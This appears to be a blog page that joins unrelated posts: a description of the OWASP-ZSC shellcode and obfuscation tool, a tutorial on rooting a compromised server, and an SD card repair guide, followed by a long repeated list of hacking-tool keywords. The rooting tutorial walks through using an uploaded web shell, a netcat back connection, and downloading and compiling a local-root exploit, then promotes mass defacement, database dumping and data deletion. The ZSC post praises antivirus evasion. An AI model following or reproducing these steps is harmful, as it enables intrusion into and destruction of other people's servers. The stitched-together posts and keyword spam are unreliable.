Monday, August 31, 2020

OWASP-ZSC: A Shellcode/Obfuscate Customized Code Generating Tool


About OWASP-ZSC
   OWASP ZSC is open source software written in python which lets you generate customized shellcodes and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with Python 2 or 3.

   What is shellcode?: Shellcode is a small codes in Assembly language which could be used as the payload in software exploitation. Other usages are in malwares, bypassing antiviruses, obfuscated codes...

   You can read more about OWASP-ZSC in these link:
Why use OWASP-ZSC?
   Another good reason for obfuscating files or generating shellcode with OWASP-ZSC is that it can be used during your pen-testing. Malicious hackers use these techniques to bypass anti-virus and load malicious files in systems they have hacked using customized shellcode generators. Anti-virus work with signatures in order to identify harmful files. When using very well known encoders such as msfvenom, files generated by this program might be already flagged by Anti-virus programs.

   Our purpose is not to provide a way to bypass anti-virus with malicious intentions, instead, we want to provide pen-testers a way to challenge the security provided by Anti-virus programs and Intrusion Detection systems during a pen test.In this way, they can verify the security just as a black-hat will do.

   According to other shellcode generators same as Metasploit tools and etc, OWASP-ZSC  using new encodes and methods which antiviruses won't detect. OWASP-ZSC encoders are able to generate shell codes with random encodes and that allows you to generate thousands of new dynamic shellcodes with the same job in just a second, that means, you will not get the same code if you use random encodes with same commands, And that make OWASP-ZSC one of the best! During the Google Summer of Code we are working on to generate Windows Shellcode and new obfuscation methods. We are working on the next version that will allow you to generate OSX.

OWASP-ZSC Installation:
   You must install Metasploit and Python 2 or 3 first:
  • For Debian-based distro users: sudo apt install python2 python3 metasploit-framework
  • For Arch Linux based distro users: sudo pacman -S python2 python3 metasploit
  • For Windows users: Download Python and Metasploit here.
   And then, enter these command (If you're Windows user, don't enter sudo):
DISCLAIMER: THIS SOFTWARE WAS CREATED TO CHALLENGE ANTIVIRUS TECHNOLOGY, RESEARCH NEW ENCRYPTION METHODS, AND PROTECT SENSITIVE OPEN SOURCE FILES WHICH INCLUDE IMPORTANT DATA. CONTRIBUTORS AND OWASP FOUNDATION WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL USAGE.

An example of OWASP-ZSC
More articles

Sunday, August 30, 2020

HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)


Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT 
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
More information

How To Repair A Crashed SD Card And Protect Your Data

One of the many reasons users prefer Android devices is the ability to expand the amount of available storage space using the MicroSD Card. Since we have the ability add up to 256GB of external storage to Android devices today, you're bound to choke up when the SD card crashes without any tell-tale signs.
If you're experiencing issues on how to repair a crashed SD card on your Android device, there are certain fixes you can try out. Since there's not a singular solution to SD Card issues, we've created a guide to help you detect the issue with your external storage and mentioned multiple solutions to get your SD card working and even retrieve your stored data along with it.


Before you start

Don't format the card if you want to retain any of the photos on it. You can follow the tips in our separate article on how to format a write-protected SD card after you've tried to recover any files that are on your card.

Now, try and find a different card reader. If you've inserted an SD card into your laptop or PC's built-in slot and nothing happens, try using a different computer or a USB card reader.
Sometimes it's the reader at fault – not the card. You can buy a USB SD card reader online for just a couple of pounds which will accept both microSD and standard SD cards.

Steps to Repair a Crashed SD Card and Protect your Data:

Step 1 – Physically clean the SD Card

Despite being durable and built to last, SD cards are prone to crashing sometimes due to physical damage. Since you carry your phone around everywhere, some dirt and dust are bound to fill up in the cracks, that can make SD card stop working from time to time.
The first thing you can try to do on how to repair a crashed SD card is physically scrub and clean it.
  • Remove the MicroSD card from your Android device and place it on a clean surface. Make sure that you turn off your phone before pulling out the SD card for safety.
  • Flip the MicroSD card and using a white eraser, gently scrub the gold contact pins of the SD card to get rid of any residual dirt or grime.
  • If you have an alcohol-based cleaning solution or even nail polish remover around, dab it on to the connector pins using a Q-tip and gently rub it.
Once the SD card has dried out, you can plug it back into your Android device and turn it on to see if the solution has worked.


Step 2 – Format the SD Card

If your SD card is being detected by the Android device but you're having trouble accessing the saved files, there's a good chance that the files are corrupt. This could either be due to a particular broken file in the saved storage, or a virus that is causing the issue.
Either way, the only option there is left for you to try out is make the SD card reusable for formatting it.
  • From the home screen of your Android device, head over to the Settings app and then scroll down to find the Storage
  • In the Storage tab, you'll be able to find the Erase SD Card option, so go ahead and select it.
  • Confirm your action to delete all of the files and folders stored on your SD card and this should effectively solve the issue.

Step 3 – Check the SD card compatibility

If you are trying to figure out how to repair a crashed SD card on an older Android device, you might just need to look at the details more carefully. If your SD card fails to be recognized on the mobile device but works with your computer, the problem could be related to compatibility.
  • If the MicroSD card that you are trying to use with your older phone is SDXC version (built for higher transfer speeds), it will not be recognized.
  • Look up the maximum capacity of expandable storage that is supported by your device, since they can vary from starting at 64GB to all the way up to 256GB.

Step 4 – Diagnose the SD card using a PC

If a simple format did not help you solve the SD card problem, you might need a more technical analysis of the issue. To do so, you can plug in your SD card into a computer and use the diagnostic tools to find out the pertaining errors and effectively fix them.
  • Connect your Android mobile device to a computer using a USB cable.
  • Make sure that you connect Android as MSC (Mass storage mode) and not MTP (Media transfer mode). You can do this using the notification menu once you connect the phone to your computer.
  • Launch the Windows Explorer and right click on the SD card driver you see on the screen. In the options menu, choose Properties – Tools – Error Checking and wait for the entire process to complete.
  • The computer will try to update the software for your SD card and fix any errors that are causing it to crash.

Step 5 – Use chkdsk to fix/repair a corrupted SD card without data loss

The "chkdsk" command is your first choice for damaged SD card repair. Requiring no format, it allows you to fix or repair a corrupted SD card and regain access to all your important files on the device. Let's see how it works. (I'm using Windows 7 for this demonstration)
1. Plug in your SD card to your computer with a card reader.
2. Go to the start menu, type in "cmd" in a search bar, hit enter and then you can see something named "cmd. exe" in a list of programs.
3. Right-click "cmd. exe" and then you will get the following command windows that allow you to fix your corrupted SD card without formatting.
4. Type in "chkdsk /X /f sd card letter:" or "chkdsk sd card letter: /f ", for example,"chkdsk /X /f G:" or "chkdsk h: /f".
After finishing all the steps, Windows will have checked and fixed the file system of the SD card. It usually takes several minutes. After that, if you see "Windows has made corrections to the file system" in the command window, then congratulations! The damaged SD card is successfully fixed and you can see your data again. If not, you should try a third-party data recovery software to retrieve your files from the damaged SD card and repair it by formatting.
Once the process has been completed, you can go ahead and pop the SD card back into your Android device and see if the issue has been resolved.

Step 6 : Use EaseUS Data Recovery Wizard to recover data from damaged SD card

1. Connect the corrupted SD card to your PC, launch EaseUS's data recovery software, select the card and click "Scan".
2. A quick scan will first start to search all the lost and existing data on the SD card. And after that, a deep scan will automatically launch in order to find more files.
3. After the scan, choose those files you want to recover and click the "Recover" button to retrieve them back.

Final Words :

So finally through this article, you have got to know about the method by which the SD card could be repaired and hence the data in it could be saved for the further access. We have tried to present the method in easy to grab manner and we believe that you could possibly get to know about it easily. Hope that you would have liked the information in this post, if it is so then please share it with others. Also, do not forget to share the post with others, let most of the people know about the method. Share your comments about the post through using the comment box below. At last never the fewer thanks for reading this post!
More info
  1. Tools 4 Hack
  2. New Hack Tools
  3. Hack Tools Download
  4. Hacking Tools Github
  5. Nsa Hack Tools
  6. Hacker
  7. Hack Tools Github
  8. Hacker Tool Kit
  9. Nsa Hack Tools
  10. Hacking Tools For Mac
  11. Tools Used For Hacking
  12. Pentest Tools Kali Linux
  13. Usb Pentest Tools
  14. Hacking Tools Mac
  15. Hack Tools For Mac
  16. Hack Tools For Pc
  17. Computer Hacker
  18. Hacker Tools 2020
  19. Pentest Tools Download
  20. Hacker Tools Apk Download
  21. What Is Hacking Tools
  22. Physical Pentest Tools
  23. Pentest Tools Review
  24. Easy Hack Tools
  25. Hacker Tools Github
  26. Tools For Hacker
  27. Hak5 Tools
  28. Tools Used For Hacking
  29. Pentest Tools Port Scanner
  30. Hacker Tools 2019
  31. Hacking Tools Mac
  32. Hacking Tools 2020
  33. Hacking Tools For Windows 7
  34. Hacking Tools Name
  35. Hacking Tools For Beginners
  36. Hacking Tools Windows 10
  37. Hacking Tools Software
  38. Best Pentesting Tools 2018
  39. Top Pentest Tools
  40. Pentest Tools Github
  41. Hacker Tools Github
  42. Hacker Tool Kit
  43. Pentest Reporting Tools
  44. Hacker Tools For Windows
  45. Hack Tools Mac
  46. Hacking Tools Software
  47. Hack Tools For Pc
  48. Pentest Tools Tcp Port Scanner
  49. Pentest Tools Alternative
  50. Pentest Tools Free
  51. Hacker Tools For Pc
  52. Pentest Tools Bluekeep
  53. Pentest Tools Online
  54. Hacker Tools Linux
  55. Hacking Tools Windows 10
  56. Hacker Tools For Mac
  57. Pentest Tools Kali Linux
  58. Hacker Tools Free
  59. Android Hack Tools Github
  60. Hacking Tools Windows
  61. Hack And Tools
  62. How To Install Pentest Tools In Ubuntu
  63. Hacker Hardware Tools
  64. Pentest Box Tools Download
  65. Hack Rom Tools
  66. Hacker Tool Kit
  67. Termux Hacking Tools 2019
  68. Pentest Tools Alternative
  69. Hacking Tools Online
  70. Physical Pentest Tools
  71. Hacker Tool Kit
  72. Hacker Tools For Windows
  73. New Hacker Tools
  74. Hack Website Online Tool
  75. Hack Tools For Windows
  76. Hacking Tools Software
  77. Nsa Hack Tools Download
  78. Pentest Tools Subdomain
  79. Pentest Tools Github
  80. Pentest Tools For Mac
  81. Growth Hacker Tools
  82. Hacker Techniques Tools And Incident Handling
  83. Hack Tools Online
  84. Hacking Tools For Mac
  85. Underground Hacker Sites
  86. Pentest Tools Download
  87. Hackrf Tools
  88. Hacking Tools Hardware
  89. Hacking Tools 2019
  90. Hacking Tools And Software
  91. Hacker Techniques Tools And Incident Handling
  92. Hacker Tools Free Download
  93. Hack Tool Apk No Root
  94. Nsa Hack Tools
  95. Hacking Apps
  96. Hack Website Online Tool
  97. Pentest Tools Github
  98. Github Hacking Tools
  99. Hack Tool Apk
  100. Hacker Tools For Ios
  101. Pentest Tools Subdomain
  102. Hacking Tools Free Download
  103. Pentest Tools Free
  104. Hacker Tools Windows
  105. Hacker Techniques Tools And Incident Handling
  106. Pentest Tools Android
  107. Pentest Tools Kali Linux
  108. Hacker Tool Kit
  109. Hacker Tools Github
  110. Github Hacking Tools
  111. Hack Tools For Games
  112. Hacking Tools For Windows
  113. Hack Tool Apk
  114. Hack Tool Apk
  115. Hacker Tools Free Download
  116. Hack Tool Apk
  117. Hacker Tools Github
  118. Hacker Tools For Ios
  119. Android Hack Tools Github
  120. Hacker Tools Windows
  121. Hack Tool Apk
  122. Pentest Tools Windows
  123. Pentest Tools Tcp Port Scanner
  124. Hack Tools For Pc
  125. Pentest Tools Android
  126. Pentest Tools Review
  127. Hack Tools Mac
  128. Pentest Tools Nmap
  129. Pentest Tools Windows
  130. Nsa Hack Tools
  131. Tools 4 Hack
  132. Hacker Tools 2019
  133. Best Pentesting Tools 2018
  134. Game Hacking
  135. Hacking Tools Pc
  136. Nsa Hack Tools
  137. Hacker Tools Github
  138. Pentest Tools Framework
  139. World No 1 Hacker Software
  140. Hacker Tools Apk Download
  141. Hacking Apps
  142. Pentest Tools Online
  143. Pentest Tools For Android
  144. Hacking Tools Windows
  145. Hacking Tools
  146. Pentest Tools Website
  147. Pentest Tools List